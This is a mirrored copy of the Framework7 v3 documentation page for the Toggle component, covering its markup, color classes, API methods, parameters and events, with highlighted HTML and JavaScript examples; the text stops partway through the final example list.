<!DOCTYPE html>
<html>

<!-- Mirrored from framework7.io/docs/toggle.html by HTTrack Website Copier/3.x [XR&CO'2017], Tue, 16 Oct 2018 03:57:33 GMT -->
<head>
<meta charset="utf-8">
<title>Toggle | Framework7 Documentation</title>
<meta property="og:image" content="../i/f7-banner.jpg">
<meta name="viewport" content="width=device-width, viewport-fit=cover">
<meta name="twitter:card" content="summary">
<meta name="twitter:site" content="@framework7io">
<meta name="twitter:creator" content="@framework7io">
<meta name="twitter:title" content="Toggle | Framework7 Documentation">
<meta name="twitter:image" content="../../external.html?link=https://avatars0.githubusercontent.com/u/31954178?s=200&amp;v=4">
<link rel="stylesheet" href="../../cdn.framework7.io/css/normalize.html">
<link rel="stylesheet" href="../../cdn.framework7.io/css/main.html">
<link rel="shortcut icon" href="../i/favicon.png">
<script src="../../cdn.framework7.io/js/modernizr-2.7.1.min.html"></script>
</head>
<body class="body-docs">
<header class="internal-header">
<div class="center">
<div class="logo-holder"><a class="logo" href="../../external.html?link=http://framework7.io/"></a></div>
<div class="header-content">
<div class="title">Framework7
<div class="version">v3.4.2</div>
</div>
<ul class="nav">
<li><a href="index.html">Docs</a>
<ul>
<li><a href="introduction.html">Getting Started</a></li>
<li><a href="index.html">Framework7 Core / API</a></li>
<li><a href="../../external.html?link=http://framework7.io/vue/">Framework7 Vue</a></li>
<li><a href="../../external.html?link=http://framework7.io/react/">Framework7 React</a></li>
<li><a href="dom7.html">Dom7</a></li>
<li><a href="../../external.html?link=http://idangero.us/template7/" target="_blank">Template7</a></li>
<li><a href="../../external.html?link=http://v1.framework7.io/" target="_blank">Framework7 v1</a></li>
<li><a href="../../external.html?link=http://v2.framework7.io/" target="_blank">Framework7 v2</a></li>
</ul>
</li>
<li><a href="#">Resources</a>
<ul>
<li><a href="../../external.html?link=http://forum.framework7.io/" target="_blank">Community Forum</a></li>
<li><a href="../../external.html?link=http://framework7.io/tutorials/">Tutorials</a></li>
<li><a href="../../external.html?link=http://framework7.io/templates/">Templates</a></li>
<li><a href="../../external.html?link=http://framework7.io/plugins/">Plugins</a></li>
<li><a href="../../external.html?link=http://framework7.io/showcase/">Apps Showcase</a></li>
<li><a href="../../external.html?link=http://framework7.io/icons/">Framework7 Icons</a></li>
</ul>
</li>
<li><a href="../../external.html?link=http://blog.framework7.io/" target="_blank">Blog</a></li>
<li><a href="../../external.html?link=http://framework7.io/contribute/">Contribute</a></li>
</ul>
<div class="patreon-github"><a class="patreon-button" href="../../external.html?link=https://www.patreon.com/vladimirkharlampidi" target="_blank"><span class="patreon-logo"></span><span class="patreon-text">Support Framework7</span></a>
<div class="github-buttons"><a href="../../external.html?link=https://github.com/nolimits4web/framework7/" target="_blank"><img src="../../cdn.framework7.io/i/gh-logo.html"></a><a class="gh-stars" href="../../external.html?link=https://github.com/nolimits4web/framework7/" target="_blank"><span></span> stars</a><a class="gh-forks" href="../../external.html?link=https://github.com/nolimits4web/framework7/" target="_blank"><span></span> forks</a></div>
</div>
</div>
<div class="carbon"><script async type="text/javascript" src="../../cdn.carbonads.com/carbona3d4.js" id="_carbonads_js"></script></div>
</div>
</header>
<div class="bsa-cpc"></div>
<main>
<div class="center">
<div class="docs-demo-device docs-demo-device-ios">
<div class="docs-demo-device-buttons"><a class="active" data-theme="ios">iOS</a><a data-theme="md">Android</a></div>
<div class="docs-demo-device-iframe">
<iframe width="320" height="548" frameborder="0" scrolling="on"></iframe>
<div class="fade-overlay"></div>
</div>
<div class="docs-demo-device-android-buttons">
<div class="triangle"></div>
<div class="circle"></div>
<div class="square"></div>
</div>
</div>
<div class="docs-nav">
<div class="docs-nav-toggle"><span></span><span></span><span></span></div>
<div class="docs-nav-searchbar">
<input type="search" placeholder="Search"><span class="disable-search"></span>
</div>
<ul>
<li>
<div class="title">Get Started</div>
<ul>
<li><a href="introduction.html">Introduction</a></li>
<li><a href="kitchen-sink.html">Kitchen Sink</a></li>
<li><a href="installation.html">Installation</a></li>
<li><a href="app-layout.html">App HTML Layout</a></li>
<li><a href="rtl-layout.html">RTL Layout</a></li>
<li><a href="init-app.html">Initialize App</a></li>
</ul>
</li>
<li>
<div class="title">Events</div>
<ul>
<li><a href="events.html">Events</a></li>
</ul>
</li>
<li>
<div class="title">Router / Navigation</div>
<ul>
<li><a href="routes.html">Routes</a></li>
<li><a href="router-component.html">Router Component</a></li>
<li><a href="view.html#router-api-methods-properties">Router API</a></li>
</ul>
</li>
<li>
<div class="title">Components</div>
<ul>
<li><a href="app.html">App / Core</a></li>
<li><a href="accordion.html">Accordion / Collapsible</a></li>
<li><a href="action-sheet.html">Action Sheet / Actions</a></li>
<li><a href="autocomplete.html">Autocomplete</a></li>
<li><a href="badge.html">Badge</a></li>
<li><a href="block.html">Block / Content Block</a></li>
<li><a href="button.html">Button</a></li>
<li><a href="calendar.html">Calendar / Datepicker</a></li>
<li><a href="cards.html">Cards</a></li>
<li><a href="checkbox.html">Checkbox</a></li>
<li><a href="chips.html">Chips / Tags</a></li>
<li><a href="contacts-list.html">Contacts List</a></li>
<li><a href="data-table.html">Data Table</a></li>
<li><a href="dialog.html">Dialog</a></li>
<li><a href="elevation.html">Elevation</a></li>
<li><a href="floating-action-button.html">Floating Action Button / FAB</a></li>
<li><a href="form.html">Form Data / Storage</a></li>
<li><a href="gauge.html">Gauge</a></li>
<li><a href="grid.html">Grid / Layout Grid</a></li>
<li><a href="icons.html">Icons</a></li>
<li><a href="infinite-scroll.html">Infinite Scroll</a></li>
<li><a href="inputs.html">Inputs / Form Inputs</a></li>
<li><a href="lazy-load.html">Lazy Load</a></li>
<li><a href="link.html">Link</a></li>
<li><a href="list-view.html">List View</a></li>
<li><a href="list-index.html">List Index</a></li>
<li><a href="login-screen.html">Login Screen</a></li>
<li><a href="messagebar.html">Messagebar</a></li>
<li><a href="messages.html">Messages</a></li>
<li><a href="navbar.html">Navbar</a></li>
<li><a href="notification.html">Notification</a></li>
<li><a href="page.html">Page</a></li>
<li><a href="panel.html">Panel / Side Panels</a></li>
<li><a href="photo-browser.html">Photo Browser</a></li>
<li><a href="picker.html">Picker</a></li>
<li><a href="popover.html">Popover</a></li>
<li><a href="popup.html">Popup</a></li>
<li><a href="preloader.html">Preloader</a></li>
<li><a href="progressbar.html">Progressbar</a></li>
<li><a href="pull-to-refresh.html">Pull to Refresh</a></li>
 <li><a href="radio.html">Radio</a></li>
<li><a href="range-slider.html">Range Slider</a></li>
<li><a href="searchbar.html">Searchbar</a></li>
<li><a href="sheet-modal.html">Sheet Modal</a></li>
<li><a href="smart-select.html">Smart Select</a></li>
<li><a href="sortable-list.html">Sortable List</a></li>
<li><a href="statusbar.html">Statusbar</a></li>
<li><a href="stepper.html">Stepper</a></li>
<li><a href="subnavbar.html">Subnavbar</a></li>
<li><a href="swiper.html">Swiper</a></li>
<li><a href="swipeout.html">Swipeout</a></li>
<li><a href="tabs.html">Tabs</a></li>
<li><a href="timeline.html">Timeline</a></li>
<li><a href="toast.html">Toast</a></li>
<li><a href="toggle.html">Toggle</a></li>
<li><a href="toolbar-tabbar.html">Toolbar / Tabbar</a></li>
<li><a href="tooltip.html">Tooltip</a></li>
<li><a href="vi.html">Video Intelligence (vi)</a></li>
<li><a href="view.html">View / Router</a></li>
<li><a href="virtual-list.html">Virtual List</a></li>
</ul>
</li>
<li>
<div class="title">Framework7 Icons</div>
<ul>
<li><a href="../../external.html?link=http://framework7.io/icons/">Framework7 Icons Cheatsheet</a></li>
</ul>
</li>
<li>
<div class="title">Styling</div>
<ul>
<li><a href="iphone-x.html">iPhone X</a></li>
<li><a href="color-themes.html">Color Themes</a></li>
<li><a href="typography.html">Typography</a></li>
<li><a href="hairlines.html">Hairlines</a></li>
</ul>
</li>
<li>
<div class="title">Dom7</div>
<ul>
<li><a href="dom7.html">Dom7</a></li>
</ul>
</li>
<li>
<div class="title">Template7</div>
<ul>
<li><a href="template7.html">Template7</a></li>
</ul>
</li>
<li>
<div class="title">Fast Clicks</div>
<ul>
<li><a href="fast-clicks.html">Fast Clicks</a></li>
<li><a href="active-state.html">Active State</a></li>
<li><a href="tap-hold.html">Tap Hold Event (Long Tap)</a></li>
<li><a href="touch-ripple.html">Touch Ripple (MD Theme)</a></li>
</ul>
</li>
<li>
<div class="title">Utilities</div>
<ul>
<li><a href="request.html">Request / Ajax</a></li>
<li><a href="utils.html">Utils</a></li>
<li><a href="device.html">Device</a></li>
<li><a href="support.html">Support</a></li>
</ul>
</li>
<li>
<div class="title">Plugins API</div>
<ul>
<li><a href="plugins-api.html">Plugins API</a></li>
</ul>
</li>
<li>
<div class="title">Lazy Modules</div>
<ul>
<li><a href="lazy-modules.html">Lazy Modules</a></li>
</ul>
</li>
<li>
<div class="title">Custom Build</div>
<ul>
<li><a href="custom-build.html">Custom Build</a></li>
</ul>
</li>
</ul>
</div>
<div class="docs-content">
<div class="improve-docs-link"><a href="../../external.html?link=https://github.com/framework7io/framework7-website/edit/master/src/pug/docs/toggle.pug" target="_blank">Improve this Doc</a></div>
<h1>Toggle</h1>
<ul class="docs-index"></ul>
<h2>Toggle Layout</h2>
<p>Layout is pretty simple:</p><pre><code class="html"><span class="token comment">&lt;!-- Toggle element --></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>label</span> <span class="token attr-name">class</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>toggle<span class="token punctuation">"</span></span><span class="token punctuation">></span></span>
  <span class="token comment">&lt;!-- Toggle input --></span>
  <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>input</span> <span class="token attr-name">type</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>checkbox<span class="token punctuation">"</span></span><span class="token punctuation">></span></span>
  <span class="token comment">&lt;!-- Toggle icon --></span>
  <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>span</span> <span class="token attr-name">class</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>toggle-icon<span class="token punctuation">"</span></span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>span</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>label</span><span class="token punctuation">></span></span></pre></code>
<p>Inside of Simple List:</p><pre><code class="html"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>div</span> <span class="token attr-name">class</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>list simple-list<span class="token punctuation">"</span></span><span class="token punctuation">></span></span>
  <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>ul</span><span class="token punctuation">></span></span>
    ...
    <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>li</span><span class="token punctuation">></span></span>
      <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>span</span><span class="token punctuation">></span></span>Text label<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>span</span><span class="token punctuation">></span></span>
      <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>label</span> <span class="token attr-name">class</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>toggle<span class="token punctuation">"</span></span><span class="token punctuation">></span></span>
        <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>input</span> <span class="token attr-name">type</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>checkbox<span class="token punctuation">"</span></span><span class="token punctuation">></span></span>
        <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>span</span> <span class="token attr-name">class</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>toggle-icon<span class="token punctuation">"</span></span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>span</span><span class="token punctuation">></span></span>
      <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>label</span><span class="token punctuation">></span></span>
    <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>li</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>div</span><span class="token punctuation">></span></span></pre></code>
<p>Inside of usual List (preferable in <code>item-after</code>):</p><pre><code class="html"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>div</span> <span class="token attr-name">class</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>list<span class="token punctuation">"</span></span><span class="token punctuation">></span></span>
  <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>ul</span><span class="token punctuation">></span></span>
    ...
    <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>li</span> <span class="token attr-name">class</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>item-content<span class="token punctuation">"</span></span><span class="token punctuation">></span></span>
      <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>div</span> <span class="token attr-name">class</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>item-inner<span class="token punctuation">"</span></span><span class="token punctuation">></span></span>
        <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>div</span> <span class="token attr-name">class</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>item-title<span class="token punctuation">"</span></span><span class="token punctuation">></span></span>Text label<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>div</span><span class="token punctuation">></span></span>
        <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>div</span> <span class="token attr-name">class</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>item-after<span class="token punctuation">"</span></span><span class="token punctuation">></span></span>
          <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>label</span> <span class="token attr-name">class</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>toggle<span class="token punctuation">"</span></span><span class="token punctuation">></span></span>
            <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>input</span> <span class="token attr-name">type</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>checkbox<span class="token punctuation">"</span></span><span class="token punctuation">></span></span>
            <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>span</span> <span class="token attr-name">class</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>toggle-icon<span class="token punctuation">"</span></span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>span</span><span class="token punctuation">></span></span>
          <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>label</span><span class="token punctuation">></span></span>
        <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>div</span><span class="token punctuation">></span></span>
      <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>div</span><span class="token punctuation">></span></span>
    <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>li</span><span class="token punctuation">></span></span>
  <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>ul</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>div</span><span class="token punctuation">></span></span></pre></code>
<h2>Toggle Colors</h2>
<p>Toggle supports all <a href="color-themes.html">default colors</a>. So to change its color just add color-[color] class to toggle element.</p><pre><code class="html"><span class="token comment">&lt;!-- red toggle --></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>label</span> <span class="token attr-name">class</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>toggle color-red<span class="token punctuation">"</span></span><span class="token punctuation">></span></span>...<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>label</span><span class="token punctuation">></span></span>

<span class="token comment">&lt;!-- orange toggle --></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>label</span> <span class="token attr-name">class</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>toggle color-orange<span class="token punctuation">"</span></span><span class="token punctuation">></span></span>...<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>label</span><span class="token punctuation">></span></span></pre></code>
<h2>Toggle App Methods</h2>
<p>Let's look at related App methods to work with Toggle:</p>
<div class="method-wrap">
<p><span class="method">app.toggle.create(<span>parameters</span>)</span>- create Toggle instance</p>
<ul class="method-parameters">
<li><span class="parameter">parameters</span> - <span class="parameter-type">object</span>. Object with toggle parameters</li>
</ul>
<p class="method-returns">Method returns created Toggle's instance</p>
</div>
<div class="method-wrap">
<p><span class="method">app.toggle.destroy(<span>el</span>)</span>- destroy Toggle instance</p>
<ul class="method-parameters">
<li><span class="parameter">el</span> - <span class="parameter-type">HTMLElement</span> or <span class="parameter-type">string</span> (with CSS Selector) or <span class="parameter-type">object</span>. Toggle element or Toggle instance to destroy.</li>
</ul>
</div>
<div class="method-wrap">
<p><span class="method">app.toggle.get(<span>el</span>)</span>- get Toggle instance by HTML element</p>
<ul class="method-parameters">
<li><span class="parameter">el</span> - <span class="parameter-type">HTMLElement</span> or <span class="parameter-type">string</span> (with CSS Selector). Toggle element.</li>
</ul>
<p class="method-returns">Method returns Toggle's instance</p>
</div>
<h2>Toggle Parameters</h2>
<p>Now let's look at list of available parameters we need to create Toggle:</p>
<table class="params-table">
<thead>
<tr>
<th>Parameter</th>
<th>Type</th>
<th>Default</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>el</td>
<td>HTMLElement<br>string</td>
 <td></td>
<td>Toggle element. HTMLElement or string with CSS selector of toggle element</td>
</tr>
<tr>
<td>on</td>
<td>object</td>
<td></td>
<td>
Object with events handlers. For example:<pre><code class="js"><span class="token keyword">var</span> toggle <span class="token operator">=</span> app<span class="token punctuation">.</span>toggle<span class="token punctuation">.</span><span class="token function">create</span><span class="token punctuation">(</span><span class="token punctuation">{</span>
  el<span class="token punctuation">:</span> <span class="token string">'.toggle'</span><span class="token punctuation">,</span>
  on<span class="token punctuation">:</span> <span class="token punctuation">{</span>
    change<span class="token punctuation">:</span> <span class="token keyword">function</span> <span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
      <span class="token built-in">console</span><span class="token punctuation">.</span><span class="token function">log</span><span class="token punctuation">(</span><span class="token string">'Toggle changed'</span><span class="token punctuation">)</span>
    <span class="token punctuation">}</span>
  <span class="token punctuation">}</span>
<span class="token punctuation">}</span><span class="token punctuation">)</span>
</pre></code>
</td>
</tr>
</tbody>
</table>
<h2>Toggle Methods & Properties</h2>
<p>So to create Toggle we have to call:</p><pre><code class="js"><span class="token keyword">var</span> toggle <span class="token operator">=</span> app<span class="token punctuation">.</span>toggle<span class="token punctuation">.</span><span class="token function">create</span><span class="token punctuation">(</span><span class="token punctuation">{</span> <span class="token comment">/* parameters */</span> <span class="token punctuation">}</span><span class="token punctuation">)</span></pre></code>
<p>After that we have its initialized instance (like <code>toggle</code> variable in example above) with useful methods and properties:</p>
<table class="methods-table">
<tbody>
<tr>
<th colspan="2">Properties</th>
</tr>
<tr>
<td>toggle.app</td>
<td>Link to global app instance</td>
</tr>
<tr>
<td>toggle.el</td>
<td>Toggle HTML element</td>
</tr>
<tr>
<td>toggle.$el</td>
<td>Dom7 instance with toggle HTML element</td>
</tr>
<tr>
<td>toggle.inputEl</td>
<td>Toggle input HTML element</td>
</tr>
<tr>
<td>toggle.$inputEl</td>
<td>Dom7 instance with toggle input HTML element</td>
</tr>
<tr>
<td>toggle.checked</td>
<td>Boolean property indicating whether it is input is checked or not</td>
</tr>
<tr>
<td>toggle.params</td>
<td>Toggle parameters</td>
</tr>
<tr>
<th colspan="2">Methods</th>
</tr>
<tr>
<td>toggle.toggle()</td>
<td>Toggle input state</td>
</tr>
<tr>
<td>toggle.on(<span>event</span>, <span>handler</span>)</td>
<td>Add event handler</td>
</tr>
<tr>
<td>toggle.once(<span>event</span>, <span>handler</span>)</td>
<td>Add event handler that will be removed after it was fired</td>
</tr>
<tr>
<td>toggle.off(<span>event</span>, <span>handler</span>)</td>
<td>Remove event handler</td>
</tr>
<tr>
<td>toggle.off(<span>event</span>)</td>
<td>Remove all handlers for specified event</td>
</tr>
<tr>
<td>toggle.emit(<span>event</span>, <span>...args</span>)</td>
<td>Fire event on instance</td>
</tr>
</tbody>
</table>
<h2>Toggle Events</h2>
<p>Toggle will fire the following DOM events on toggle element and events on app and toggle instance:</p>
<h3>DOM Events</h3>
<table class="events-table">
<thead>
<tr>
<th>Event</th>
<th>Target</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>toggle:change</td>
<td>Toggle Element<span>&lt;div class="toggle"&gt;</span></td>
<td>Event will be triggered when Toggle state has been changed</td>
</tr>
<tr>
<td>toggle:beforedestroy</td>
<td>Toggle Element<span>&lt;div class="toggle"&gt;</span></td>
<td>Event will be triggered right before Toggle instance will be destroyed</td>
</tr>
</tbody>
</table>
<h3>App and Toggle Instance Events</h3>
<p>Toggle instance emits events on both self instance and app instance. App instance events has same names prefixed with <code>toggle</code>.</p>
<table class="events-table">
<thead>
<tr>
<th>Event</th>
<th>Arguments</th>
<th>Target</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>change</td>
<td><span>toggle</span></td>
<td>toggle</td>
<td rowspan="2">Event will be triggered when toggle state has been changed. As an argument event handler receives toggle instance</td>
</tr>
<tr>
<td>toggleChange</td>
<td><span>toggle</span></td>
<td>app</td>
</tr>
<tr>
<td>beforeDestroy</td>
<td><span>toggle</span></td>
<td>toggle</td>
<td rowspan="2">Event will be triggered right before Toggle instance will be destroyed. As an argument event handler receives toggle instance</td>
</tr>
<tr>
<td>toggleBeforeDestroy</td>
<td><span>toggle</span></td>
<td>app</td>
</tr>
</tbody>
</table>
<h2>Toggle Auto Initialization</h2>
<p>If you don't need to use toggle API and your toggle is inside of page and presented in DOM on moment of page initialization then it can be auto initialized with just adding additional <code>toggle-init</code> class:</p><pre><code class="html"><span class="token comment">&lt;!-- Add toggle-init class --></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>label</span> <span class="token attr-name">class</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>toggle toggle-init<span class="token punctuation">"</span></span><span class="token punctuation">></span></span>
  <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>input</span> <span class="token attr-name">type</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>checkbox<span class="token punctuation">"</span></span><span class="token punctuation">></span></span>
  <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>span</span> <span class="token attr-name">class</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>toggle-icon<span class="token punctuation">"</span></span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>span</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>label</span><span class="token punctuation">></span></span></pre></code>
<p>In this case if you need to access created Toggle instance you can use the <code>app.toggle.get</code> app method:</p><pre><code class="js"><span class="token keyword">var</span> toggle <span class="token operator">=</span> app<span class="token punctuation">.</span>toggle<span class="token punctuation">.</span><span class="token keyword">get</span><span class="token punctuation">(</span><span class="token string">'.toggle'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token keyword-block">if</span> <span class="token punctuation">(</span>toggle<span class="token punctuation">.</span>checked<span class="token punctuation">)</span> <span class="token punctuation">{</span>
  <span class="token comment">// do something</span>
<span class="token punctuation">}</span></pre></code>
<div class="with-device">
<h2 data-device-preview="../docs-demos/core/toggle.html">Examples</h2><pre><code class="html"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>div</span> <span class="token attr-name">class</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>block-title<span class="token punctuation">"</span></span><span class="token punctuation">></span></span>Super Heroes<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>div</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>div</span> <span class="token attr-name">class</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>list simple-list<span class="token punctuation">"</span></span><span class="token punctuation">></span></span>
  <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>ul</span><span class="token punctuation">></span></span>
    <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>li</span><span class="token punctuation">></span></span>
      <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>span</span><span class="token punctuation">></span></span>Batman<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>span</span><span class="token punctuation">></span></span>
      <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>label</span> <span class="token attr-name">class</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>toggle toggle-init color-black<span class="token punctuation">"</span></span><span class="token punctuation">></span></span>
        <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>input</span> <span class="token attr-name">type</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>checkbox<span class="token punctuation">"</span></span> <span class="token attr-name">checked</span><span class="token punctuation">></span></span>
        <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>span</span> <span class="token attr-name">class</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>toggle-icon<span class="token punctuation">"</span></span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>span</span><span class="token punctuation">></span></span>
      <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>label</span><span class="token punctuation">></span></span>
    <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>li</span><span class="token punctuation">></span></span>
    <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>li</span><span class="token punctuation">></span></span>
      <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>span</span><span class="token punctuation">></span></span>Aquaman<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>span</span><span class="token punctuation">></span></span>
      <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>label</span> <span class="token attr-name">class</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>toggle toggle-init color-blue<span class="token punctuation">"</span></span><span class="token punctuation">></span></span>
        <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>input</span> <span class="token attr-name">type</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>checkbox<span class="token punctuation">"</span></span> <span class="token attr-name">checked</span><span class="token punctuation">></span></span>
        <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>span</span> <span class="token attr-name">class</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>toggle-icon<span class="token punctuation">"</span></span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>span</span><span class="token punctuation">></span></span>
      <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>label</span><span class="token punctuation">></span></span>
    <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>li</span><span class="token punctuation">></span></span>
    <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>li</span><span class="token punctuation">></span></span>
      <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>span</span><span class="token punctuation">></span></span>Superman<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>span</span><span class="token punctuation">></span></span>
      <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>label</span> <span class="token attr-name">class</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>toggle toggle-init color-red<span class="token punctuation">"</span></span><span class="token punctuation">></span></span>
        <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>input</span> <span class="token attr-name">type</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>checkbox<span class="token punctuation">"</span></span> <span class="token attr-name">checked</span><span class="token punctuation">></span></span>
        <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>span</span> <span class="token attr-name">class</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>toggle-icon<span class="token punctuation">"</span></span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>span</span><span class="token punctuation">></span></span>
      <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>label</span><span class="token punctuation">></span></span>
    <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>li</span><span class="token punctuation">></span></span>
    <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>li</span><span class="token punctuation">></span></span>
      <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>span</span><span class="token punctuation">></span></span>Hulk<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>span</span><span class="token punctuation">></span></span>
      <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>label</span> <span class="token attr-name">class</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>toggle toggle-init color-green<span class="token punctuation">"</span></span><span class="token punctuation">></span></span>
        <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>input</span> <span class="token attr-name">type</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>checkbox<span class="token punctuation">"</span></span><span class="token punctuation">></span></span>
        <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>span</span> <span class="token attr-name">class</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>toggle-icon<span class="token punctuation">"</span></span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>span</span><span class="token punctuation">></span></span>
